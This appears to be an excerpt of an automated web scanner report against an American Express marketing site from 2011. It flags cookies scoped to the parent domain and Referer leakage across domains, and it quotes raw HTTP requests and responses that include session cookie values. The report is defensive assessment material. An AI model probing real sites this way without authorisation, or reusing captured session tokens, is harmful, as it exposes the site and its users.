<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /getthecard/learn-about/Platinum-Card HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000OWl25Hw-p5p9o_dRR-NwERg:1115nbqmn; SaneID=173.193.214.243-1296742163652146;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:14:00 GMT Server: IBM_HTTP_Server Set-Cookie: JSESSIONID=0000AFOMkS-ScxKAuTxEZnyZ28u:10ue6mmd9;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 78382
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /getthecard/quiz HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000OWl25Hw-p5p9o_dRR-NwERg:1115nbqmn; SaneID=173.193.214.243-1296742163652146;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:13:56 GMT Server: IBM_HTTP_Server Set-Cookie: JSESSIONID=0000VSMVy7tuzcOACXutQ3FY_CD:10ue6mp18;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 39047
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /business-credit-cards/ HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /business-credit-cards/business-card-compare/business-travel-rewards-credit-cards/29789 HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:08:00 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296742080535588; path=/; expires=Sun, 07-Feb-16 14:08:00 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0000ZpAlPxhT_5TrUuiUZ9de2FR:1115nbqmn;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 199837
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /business-credit-cards/business-credit-cards?source=footer_small_business_credit_cards HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /business-credit-cards/business-solutions/overview HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:08:09 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296742089169187; path=/; expires=Sun, 07-Feb-16 14:08:09 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=00001tp4Y9HDwnJc950b6Ajopjw:1115nbqmn;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 40955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /business-credit-cards/find-business-credit-cards HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:07:56 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296742077484255; path=/; expires=Sun, 07-Feb-16 14:07:56 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0000JxgiLPWVdjPpl3er7uWxA5d:1115nbqmn;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 83384
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /business-credit-cards/see-all-business-credit-cards HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:08:06 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296742086464167; path=/; expires=Sun, 07-Feb-16 14:08:06 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0000FCsCyPmPIMRgSqck8m5BihS:1115nbqmn;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 78468
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /getthecard/ HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:07:55 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296742075628334; path=/; expires=Sun, 07-Feb-16 14:07:55 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0000iR6T3EQC4v4TK6pPmyS2MV5:10ue6mmd9;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 48572
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /getthecard/home HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:07:41 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296742061792890; path=/; expires=Sun, 07-Feb-16 14:07:41 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0000eWHgoh3xMYf3-Al0Jaz-edi:10ue6mmd9;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 48572
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
GET /business-credit-cards/?view-all-business-cards&inav=menu_cards_sbc_viewallcards HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000OWl25Hw-p5p9o_dRR-NwERg:1115nbqmn; SaneID=173.193.214.243-1296742163652146;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:14:33 GMT Server: IBM_HTTP_Server Set-Cookie: homepage=b;Expires=Thu, 10-Feb-2011 14:14:33 GMT Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 71716
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <title>OPEN from Amer ...[SNIP]... <li> <a title="" href="https://www.aeprepaid.com/index.cfm?clientkey=retail%20sales%20channel&inav=menu_myacct_giftcardbal" id="menu_myacct_giftcardbal">Gift Card Balance</a> ...[SNIP]... <li> <a title="" href="http://www.americanexpressfhr.com?inav=menu_travel_fhr" id="menu_travel_fhr">Fine Hotels & Resorts</a> ...[SNIP]... <li> <a title="" href="http://www.amextravelresources.com/#/travel-office&us_nu=dd&inav=menu_travel_findoffice" id="menu_travel_findoffice">Find a Travel Service Office </a> ...[SNIP]... <br /> <a href="http://ad.doubleclick.net/clk;224762057;48546474;q?https://axptravel.americanexpress.com/consumertravel/travel.do?intlink=ctn-xs000049" id="menu_xsell_booktravel" title="">Book Now</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/HomePage.aspx?us_nu=dd&inav=menu_rewards_mrhome" id="menu_rewards_mrhome">Membership Rewards® Home</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/?inav=menu_rewards_usepoints" id="menu_rewards_usepoints">Use Points</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/catalog/earn/default.aspx?inav=menu_rewards_earnpoints" id="menu_rewards_earnpoints">Earn Points</a> ...[SNIP]... <li> <a title="" href="http://offers.amexnetwork.com/selects/us/grid?categoryPath=/amexnetwork/category/Shopping&issuerName=us_prop&inav=menu_rewards_shopping" id="menu_rewards_shopping">Shopping Discounts</a> ...[SNIP]... <br /> <a href="http://dailywish.amexnetwork.com/default.aspx?cid=dailywish-issuer-inav-prop" id="menu_xsell_dailywish" title="">Go Now</a> ...[SNIP]... <li> <a title="" href="https://www.openforum.com/?cid=inav_home&inav=menu_business_openforum" id="menu_business_openforum">OPEN Forum</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/catalog/landing/open/Default.aspx?us_nu=dd&inav=menu_business_openrewards" id="menu_business_openrewards">Rewards & Benefits</a> ...[SNIP]... <br /> <a href="http://www.openforum.com/" id="menu_xsell_openforum" title="">Learn More</a> ...[SNIP]... <li> <a id="footer_MR" title="" href="http://www.membershiprewards.com/HomePage.aspx?us_nu=dd&inav=footer_MR">Membership Rewards® Program</a> ...[SNIP]... </a><a title="Facebook - Link will open in a new window" href="http://www.facebook.com/americanexpress"><img class="iNavIcoFaceBook" title="Facebook - Link will open in a new window" alt="Facebook - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" / ...[SNIP]... </a> <a title="Twitter - Link will open in a new window" href="http://www.twitter.com/americanexpress"><img class="iNavIcoTwitter" title="Twitter - Link will open in a new window" alt="Twitter - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" /></a> <a title="YouTube - Link will open in a new window" href="http://www.youtube.com/americanexpress"><img class="iNavIcoYouTube" title="YouTube - Link will open in a new window" alt="YouTube - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" /> ...[SNIP]... <noscript><iframe src="https://fls.doubleclick.net/activityi;src=1297440;type=opengnrl;cat=openm589;ord=1;num=1?" width="1" height="1" frameborder="0"></iframe> ...[SNIP]...
GET /business-credit-cards/business-card-compare/business-travel-rewards-credit-cards/29789?inav=menu_cards_sbc_comparecards HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:08:04 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296742084245825; path=/; expires=Sun, 07-Feb-16 14:08:04 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=00004fNX3F_bczZDyZbd5dDPUge:1115nbqmn;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 200661
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
...[SNIP]... <li> <a title="" href="https://www.aeprepaid.com/index.cfm?clientkey=retail%20sales%20channel&inav=menu_myacct_giftcardbal" id="menu_myacct_giftcardbal">Gift Card Balance</a> ...[SNIP]... <li> <a title="" href="http://www.americanexpressfhr.com?inav=menu_travel_fhr" id="menu_travel_fhr">Fine Hotels & Resorts</a> ...[SNIP]... <li> <a title="" href="http://www.amextravelresources.com/#/travel-office&us_nu=dd&inav=menu_travel_findoffice" id="menu_travel_findoffice">Find a Travel Service Office </a> ...[SNIP]... <br /> <a href="http://ad.doubleclick.net/clk;224762057;48546474;q?https://axptravel.americanexpress.com/consumertravel/travel.do?intlink=ctn-xs000049" id="menu_xsell_booktravel" title="">Book Now</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/HomePage.aspx?us_nu=dd&inav=menu_rewards_mrhome" id="menu_rewards_mrhome">Membership Rewards® Home</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/?inav=menu_rewards_usepoints" id="menu_rewards_usepoints">Use Points</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/catalog/earn/default.aspx?inav=menu_rewards_earnpoints" id="menu_rewards_earnpoints">Earn Points</a> ...[SNIP]... <li> <a title="" href="http://offers.amexnetwork.com/selects/us/grid?categoryPath=/amexnetwork/category/Shopping&issuerName=us_prop&inav=menu_rewards_shopping" id="menu_rewards_shopping">Shopping Discounts</a> ...[SNIP]... <br /> <a href="http://dailywish.amexnetwork.com/default.aspx?cid=dailywish-issuer-inav-prop" id="menu_xsell_dailywish" title="">Go Now</a> ...[SNIP]... <li> <a title="" href="https://www.openforum.com/?cid=inav_home&inav=menu_business_openforum" id="menu_business_openforum">OPEN Forum</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/catalog/landing/open/Default.aspx?us_nu=dd&inav=menu_business_openrewards" id="menu_business_openrewards">Rewards & Benefits</a> ...[SNIP]... <br /> <a href="http://www.openforum.com/" id="menu_xsell_openforum" title="">Learn More</a> ...[SNIP]... r your Eligible Spending reaches the $50,000 threshold amount. Bonus ID 2751. Terms and conditions for the Membership Rewards program apply. For more information or to enroll in the program, visit <a href="http://www.membershiprewards.com/terms">membershiprewards.com/terms</a> ...[SNIP]... <li> <a id="footer_MR" title="" href="http://www.membershiprewards.com/HomePage.aspx?us_nu=dd&inav=footer_MR">Membership Rewards® Program</a> ...[SNIP]... </a><a title="Facebook - Link will open in a new window" href="http://www.facebook.com/americanexpress"><img class="iNavIcoFaceBook" title="Facebook - Link will open in a new window" alt="Facebook - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" / ...[SNIP]... </a> <a title="Twitter - Link will open in a new window" href="http://www.twitter.com/americanexpress"><img class="iNavIcoTwitter" title="Twitter - Link will open in a new window" alt="Twitter - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" /></a> <a title="YouTube - Link will open in a new window" href="http://www.youtube.com/americanexpress"><img class="iNavIcoYouTube" title="YouTube - Link will open in a new window" alt="YouTube - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" /> ...[SNIP]... </script>
GET /business-credit-cards/business-card-compare/popular-business-charge-credit-cards/29789?inav=menu_cards_sbc_comparecards HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000OWl25Hw-p5p9o_dRR-NwERg:1115nbqmn; SaneID=173.193.214.243-1296742163652146;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:14:24 GMT Server: IBM_HTTP_Server Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 181773
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
...[SNIP]... <li> <a title="" href="https://www.aeprepaid.com/index.cfm?clientkey=retail%20sales%20channel&inav=menu_myacct_giftcardbal" id="menu_myacct_giftcardbal">Gift Card Balance</a> ...[SNIP]... <li> <a title="" href="http://www.americanexpressfhr.com?inav=menu_travel_fhr" id="menu_travel_fhr">Fine Hotels & Resorts</a> ...[SNIP]... <li> <a title="" href="http://www.amextravelresources.com/#/travel-office&us_nu=dd&inav=menu_travel_findoffice" id="menu_travel_findoffice">Find a Travel Service Office </a> ...[SNIP]... <br /> <a href="http://ad.doubleclick.net/clk;224762057;48546474;q?https://axptravel.americanexpress.com/consumertravel/travel.do?intlink=ctn-xs000049" id="menu_xsell_booktravel" title="">Book Now</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/HomePage.aspx?us_nu=dd&inav=menu_rewards_mrhome" id="menu_rewards_mrhome">Membership Rewards® Home</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/?inav=menu_rewards_usepoints" id="menu_rewards_usepoints">Use Points</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/catalog/earn/default.aspx?inav=menu_rewards_earnpoints" id="menu_rewards_earnpoints">Earn Points</a> ...[SNIP]... <li> <a title="" href="http://offers.amexnetwork.com/selects/us/grid?categoryPath=/amexnetwork/category/Shopping&issuerName=us_prop&inav=menu_rewards_shopping" id="menu_rewards_shopping">Shopping Discounts</a> ...[SNIP]... <br /> <a href="http://dailywish.amexnetwork.com/default.aspx?cid=dailywish-issuer-inav-prop" id="menu_xsell_dailywish" title="">Go Now</a> ...[SNIP]... <li> <a title="" href="https://www.openforum.com/?cid=inav_home&inav=menu_business_openforum" id="menu_business_openforum">OPEN Forum</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/catalog/landing/open/Default.aspx?us_nu=dd&inav=menu_business_openrewards" id="menu_business_openrewards">Rewards & Benefits</a> ...[SNIP]... <br /> <a href="http://www.openforum.com/" id="menu_xsell_openforum" title="">Learn More</a> ...[SNIP]... r your Eligible Spending reaches the $50,000 threshold amount. Bonus ID 2751. Terms and conditions for the Membership Rewards program apply. For more information or to enroll in the program, visit <a href="http://www.membershiprewards.com/terms">membershiprewards.com/terms</a> ...[SNIP]... <li> <a id="footer_MR" title="" href="http://www.membershiprewards.com/HomePage.aspx?us_nu=dd&inav=footer_MR">Membership Rewards® Program</a> ...[SNIP]... </a><a title="Facebook - Link will open in a new window" href="http://www.facebook.com/americanexpress"><img class="iNavIcoFaceBook" title="Facebook - Link will open in a new window" alt="Facebook - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" / ...[SNIP]... </a> <a title="Twitter - Link will open in a new window" href="http://www.twitter.com/americanexpress"><img class="iNavIcoTwitter" title="Twitter - Link will open in a new window" alt="Twitter - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" /></a> <a title="YouTube - Link will open in a new window" href="http://www.youtube.com/americanexpress"><img class="iNavIcoYouTube" title="YouTube - Link will open in a new window" alt="YouTube - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" /> ...[SNIP]... </script>
GET /business-credit-cards/business-credit-cards?source=footer_small_business_credit_cards HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <li> <a title="" href="https://www.aeprepaid.com/index.cfm?clientkey=retail%20sales%20channel&inav=menu_myacct_giftcardbal" id="menu_myacct_giftcardbal">Gift Card Balance</a> ...[SNIP]... <li> <a title="" href="http://www.americanexpressfhr.com?inav=menu_travel_fhr" id="menu_travel_fhr">Fine Hotels & Resorts</a> ...[SNIP]... <li> <a title="" href="http://www.amextravelresources.com/#/travel-office&us_nu=dd&inav=menu_travel_findoffice" id="menu_travel_findoffice">Find a Travel Service Office </a> ...[SNIP]... <br /> <a href="http://ad.doubleclick.net/clk;224762057;48546474;q?https://axptravel.americanexpress.com/consumertravel/travel.do?intlink=ctn-xs000049" id="menu_xsell_booktravel" title="">Book Now</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/HomePage.aspx?us_nu=dd&inav=menu_rewards_mrhome" id="menu_rewards_mrhome">Membership Rewards® Home</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/?inav=menu_rewards_usepoints" id="menu_rewards_usepoints">Use Points</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/catalog/earn/default.aspx?inav=menu_rewards_earnpoints" id="menu_rewards_earnpoints">Earn Points</a> ...[SNIP]... <li> <a title="" href="http://offers.amexnetwork.com/selects/us/grid?categoryPath=/amexnetwork/category/Shopping&issuerName=us_prop&inav=menu_rewards_shopping" id="menu_rewards_shopping">Shopping Discounts</a> ...[SNIP]... <br /> <a href="http://dailywish.amexnetwork.com/default.aspx?cid=dailywish-issuer-inav-prop" id="menu_xsell_dailywish" title="">Go Now</a> ...[SNIP]... <li> <a title="" href="https://www.openforum.com/?cid=inav_home&inav=menu_business_openforum" id="menu_business_openforum">OPEN Forum</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/catalog/landing/open/Default.aspx?us_nu=dd&inav=menu_business_openrewards" id="menu_business_openrewards">Rewards & Benefits</a> ...[SNIP]... <br /> <a href="http://www.openforum.com/" id="menu_xsell_openforum" title="">Learn More</a> ...[SNIP]... <li> <a id="footer_MR" title="" href="http://www.membershiprewards.com/HomePage.aspx?us_nu=dd&inav=footer_MR">Membership Rewards® Program</a> ...[SNIP]... </a><a title="Facebook - Link will open in a new window" href="http://www.facebook.com/americanexpress"><img class="iNavIcoFaceBook" title="Facebook - Link will open in a new window" alt="Facebook - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" / ...[SNIP]... </a> <a title="Twitter - Link will open in a new window" href="http://www.twitter.com/americanexpress"><img class="iNavIcoTwitter" title="Twitter - Link will open in a new window" alt="Twitter - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" /></a> <a title="YouTube - Link will open in a new window" href="http://www.youtube.com/americanexpress"><img class="iNavIcoYouTube" title="YouTube - Link will open in a new window" alt="YouTube - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" /> ...[SNIP]...
GET /business-credit-cards/business-solutions/overview?inav=menu_business_openbizservices HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:08:12 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296742092377256; path=/; expires=Sun, 07-Feb-16 14:08:12 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0000dVq5DtNsnMtO9MWYnTzsGfV:1115nbtvb;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 40955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <meta http-equiv ...[SNIP]... <li> <a title="" href="https://www.aeprepaid.com/index.cfm?clientkey=retail%20sales%20channel&inav=menu_myacct_giftcardbal" id="menu_myacct_giftcardbal">Gift Card Balance</a> ...[SNIP]... <li> <a title="" href="http://www.americanexpressfhr.com?inav=menu_travel_fhr" id="menu_travel_fhr">Fine Hotels & Resorts</a> ...[SNIP]... <li> <a title="" href="http://www.amextravelresources.com/#/travel-office&us_nu=dd&inav=menu_travel_findoffice" id="menu_travel_findoffice">Find a Travel Service Office </a> ...[SNIP]... <br /> <a href="http://ad.doubleclick.net/clk;224762057;48546474;q?https://axptravel.americanexpress.com/consumertravel/travel.do?intlink=ctn-xs000049" id="menu_xsell_booktravel" title="">Book Now</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/HomePage.aspx?us_nu=dd&inav=menu_rewards_mrhome" id="menu_rewards_mrhome">Membership Rewards® Home</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/?inav=menu_rewards_usepoints" id="menu_rewards_usepoints">Use Points</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/catalog/earn/default.aspx?inav=menu_rewards_earnpoints" id="menu_rewards_earnpoints">Earn Points</a> ...[SNIP]... <li> <a title="" href="http://offers.amexnetwork.com/selects/us/grid?categoryPath=/amexnetwork/category/Shopping&issuerName=us_prop&inav=menu_rewards_shopping" id="menu_rewards_shopping">Shopping Discounts</a> ...[SNIP]... <br /> <a href="http://dailywish.amexnetwork.com/default.aspx?cid=dailywish-issuer-inav-prop" id="menu_xsell_dailywish" title="">Go Now</a> ...[SNIP]... <li> <a title="" href="https://www.openforum.com/?cid=inav_home&inav=menu_business_openforum" id="menu_business_openforum">OPEN Forum</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/catalog/landing/open/Default.aspx?us_nu=dd&inav=menu_business_openrewards" id="menu_business_openrewards">Rewards & Benefits</a> ...[SNIP]... <br /> <a href="http://www.openforum.com/" 